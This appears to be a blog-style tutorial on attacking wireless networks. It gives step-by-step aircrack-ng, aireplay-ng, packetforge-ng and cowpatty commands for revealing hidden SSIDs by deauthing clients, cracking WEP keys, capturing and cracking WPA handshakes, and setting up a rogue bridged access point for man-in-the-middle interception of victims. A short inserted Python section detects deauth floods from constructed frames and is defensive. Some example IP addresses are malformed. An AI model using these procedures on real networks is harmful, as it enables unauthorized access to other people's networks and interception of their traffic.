Wireless Attacks Part II
Reveal Hidden SSIDs using aireplay-ng
For this attack to work you need an associated client on the network to deauth. This works on all encryption levels and even on non-encrypted APs.
Make sure to open up airodump-ng on the channel of your victim to watch for the SSID to be revealed in real time.
aireplay-ng -0 5 -a B:S:S:I:D mon0
That's all there is to it: when the client reconnects to the AP you will see the hidden SSID revealed in airodump-ng.
——————————————————————————————————————–
Decrypt WEP and WPA packets
NOTE: you must already have the network key (the password) to use this tool.
The decrypt commands differ for WEP and WPA, so there are two to remember.
For WEP encrypted files:
airdecap-ng -w password_key capture-01.cap
Then read the decrypted output with tshark (airdecap-ng writes it as capture-01-dec.cap):
tshark -r capture-01-dec.cap -c 10
For WPA encrypted files (note the different switches: -p for the passphrase and -e for the ESSID):
airdecap-ng -p password_key capture-01.cap -e linksys
——————————————————————————————————————–
Clientless WEP Attack using Fragmentation method
Step 1: aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0
Step 2: aireplay-ng -5 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0
Step 3: Use this packet? Type “Y” for yes, but make sure the size is over 68 (from experience).
Step 4: Type ls to show the files in your root directory and copy the whole file name that ends in .xor
Step 5: packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C -k 255.255.255.255 -l 255.255.255.255 -y fragment-001-002.xor -w arp-request
Step 6: airodump-ng -c 11 --bssid B:S:S:I:D --ivs -w capture mon0
Step 7: aireplay-ng -2 -r arp-request mon0
Step 8: Use this packet? Type “Y” for yes, but make sure the size is 68 or over (from experience).
Step 9: aircrack-ng -n 64 -b B:S:S:I:D *.ivs
This assumes you are attacking a 64-bit encrypted network; if not, just use the regular aircrack-ng command.
——————————————————————————————————————–
Crack WEP using ChopChop method
-1 is for Fake Authentication
-a is for your Access Point’s Mac Address
0 is for reassociation timing in seconds
-h is for your cards Mac Address or from an Associated client on the network
-e The ESSID name of your AP you are attacking
-4 is for ChopChop Attack method
Step 1:
airodump-ng -c 11 -w dump_file -i mon0
Step 2:
aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0
It should now say Association successful with a :-)
Step 3:
aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0
The destination MAC address should not read FF:FF:FF:FF:FF:FF. If it does, do not continue until it changes or the attack will not work, so keep typing “n” for no until it is no longer FF:FF:FF:FF:FF:FF.
Step 4:
Now it should say “Saving plain text in replay_000-111-11122.cap”. Copy the whole name of the .cap file.
Step 5:
tcpdump -s 0 -n -e -r replay_000-111-11122.cap
Step 6:
packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S -a B:S:S:I:D -l 192.168.1.73842 -k 192.108.123.6382 -y replay_000-111-11122.xor -w arp.cap
-0 is for the Forged Arp packet
-h is for your Mac address
-c is for the Associated Clients Mac address
-a is for the Access Points Mac address
-l is to set the destination IP Address
-k is to set the source IP Address
-y means to read the PRGA from this file
-w means to write the packet to this pcap file
Step 7:
aireplay-ng -2 -r arp.cap mon0
Step 8:
Type “y” to use the data packet when it asks, and from there the Data field in airodump-ng should start to rise dramatically.
Step 9:
aircrack-ng -a 1 -x -0 dump_file-01.ivs
dump_file is the prefix we wrote in step 1.
Step 10:
Then choose your target when asked and aircrack-ng will begin to run.
——————————————————————————————————————–
WEP attack with a Client already connected to the Access Point
Step 1:
airodump-ng -c 11 -w wep -i mon0
-c is the channel which the target is transmitting on
-w is the Dump File prefix
-i means save only captured IVs
mon0 is your monitor mode interface as always
Step 2:
aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0
-1 is for Fake Authentication
0 is for reassociation timing in seconds
-e is for the target network ESSID, i.e. the AP's actual name as given by the user, for example FREE WIFI
-a is for your Access Point's MAC Address
-h is for your own wireless card's MAC Address
Step 3:
aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0
-3 is for Arp request Replay Attack
-b is for your Access Points Mac Address
-h is for your source Mac Address “Either a Client or from a Fake Association”
Step 4:
aircrack-ng -a 1 -0 -n 128 wep-01.ivs
The 128 assumes you are cracking a 104-bit encrypted network; the file wep-01.ivs was created from the prefix given in step 1.
-a is for force Attack mode
1 is for static WEP
-0 is to apply nice colors to the aircrack-ng terminal window when opened up
-n is to specify the length for the key 128 for (104bit WEP)
——————————————————————————————————————–
Set up a Fake AP honey pot using brctl to get a client to connect and run a MITM attack
1. Bring up eth0 in BackTrack
ifconfig eth0 up
2. Bring up an access point with the SSID of whatever name you are trying to clone. For this tutorial I chose linksys, but you can make your own.
mitm is your bridged interface name; you can name it whatever you like for this attack.
at0 is the new tap interface created by your wireless card and will be named by your card automatically.
dhclient3 is your DHCP client, which will help bridge your internet to the victim.
ifconfig wlan0mon up
airmon-ng start wlan0mon
iwconfig wlan0mon channel 1
airbase-ng --essid linksys mon0
Bridge the interfaces
Open up another terminal window to run these commands
ifconfig at0 up
brctl addbr mitm
brctl show
This shows that nothing has been added to the bridge yet, so we'll do that next.
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth0 0.0.0.0 up
Vivek uses the IP address 0.0.0.0 for both interfaces, but you can try others if you like.
ifconfig at0 0.0.0.0 up
If you run ifconfig you'll see a new bridge, mitm. Bring up the interface and request an address on it:
ifconfig mitm up
dhclient3 mitm
Now connect a client to the new AP and make sure you are able to surf the web using the at0 interface and the mitm bridge handing out DHCP. If you are, the options are endless ;)
Should your eth0 interface lose its connection to the internet, kill the mitm bridge using the command below; make sure to stop it first, as well as the at0 interface.
brctl delbr mitm
brctl stands for bridge control and delbr stands for delete bridge.
——————————————————————————————————————–
WPA/WPA2 – PSK Cracking using Rainbowtables with Cowpatty
What do the switches in these commands really mean?
-c The channel the AP is located on
--bssid The MAC Address of the AP you are attacking
-0 Specifies to aireplay-ng that it will be a Deauth Attack (that's a zero, by the way)
-c after the aireplay-ng command specifies the client connected to the AP which you are attacking
./cowpatty starts running cowpatty within BackTrack
-r specifies the capture file you will be cracking using cowpatty
-d The directory of the rainbow table you will be using for the attack, i.e. its location on your hard disk.
Step 1:
airodump-ng -c 11 --bssid B:S:S:I:D -w LINKSYS mon0
Step 2:
aireplay-ng -0 1 -a B:S:S:I:D -c C:L:I:E:N:T mon0
You can increase the 1 to 5 or more depending on how many times you want to deauth the client.
Step 3:
./cowpatty or just open up Cowpatty from your start menu
Step 4:
cowpatty -r LINKSYS-01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS
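Both deauth steps on this page (revealing a hidden SSID and forcing the handshake capture above) put a burst of deauthentication frames on the air, which is exactly what a wireless IDS keys on. As an added defender-side example (not part of the original post), this Python parses raw 802.11 management frames and flags any BSSID seen in five or more deauth/disassoc frames within one second; the frames, MAC addresses, timestamps and threshold are all constructed assumptions.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC, BEACON = 0x0C, 0x0A, 0x08   # 802.11 management frame subtypes

def _mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3/bssid) for a management frame, else None."""
    if len(frame) < 24:                 # FC(2) + duration(2) + 3 addrs(18) + seq(2)
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:            # frame type 0 = management
        return None
    return fc >> 4, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22])

def deauth_storms(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, frame_bytes) in time order.
    Returns {bssid: peak count} for BSSIDs with >= threshold deauth/disassoc
    frames inside any sliding window of `window` seconds."""
    recent = defaultdict(list)          # bssid -> timestamps still inside the window
    peaks = {}
    for ts, frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        q = recent[parsed[3]]
        q.append(ts)
        while ts - q[0] > window:       # drop timestamps that fell out of the window
            q.pop(0)
        if len(q) >= threshold:
            peaks[parsed[3]] = max(peaks.get(parsed[3], 0), len(q))
    return peaks

def mgmt_frame(subtype, dst, src, bssid, reason=7):
    """Constructed minimal management frame (no FCS): FC, duration, 3 addrs, seq ctl, body."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    body = struct.pack("<H", reason) if subtype in (DEAUTH, DISASSOC) else b""
    return struct.pack("<BBH", subtype << 4, 0, 0) + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body

# Constructed sample: one beacon, six broadcast deauths within 0.3 s (a deauth flood),
# then a single deauth from another BSSID that should not be flagged.
AP, OTHER, CLIENT = "02:00:00:00:aa:01", "02:00:00:00:aa:02", "02:00:00:00:cc:02"
SAMPLE = [(0.0, mgmt_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP))]
SAMPLE += [(0.05 * i, mgmt_frame(DEAUTH, "ff:ff:ff:ff:ff:ff", AP, AP)) for i in range(1, 7)]
SAMPLE.append((5.0, mgmt_frame(DEAUTH, CLIENT, OTHER, OTHER)))

if __name__ == "__main__":
    print(deauth_storms(SAMPLE))        # {'02:00:00:00:aa:01': 6}
```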
——————————————————————————————————————–
Test a capture file to see its integrity
Open pyrit or cd into the pyrit directory and type the command below, replacing output-01.cap with your own capture file.
pyrit -r output-01.cap analyze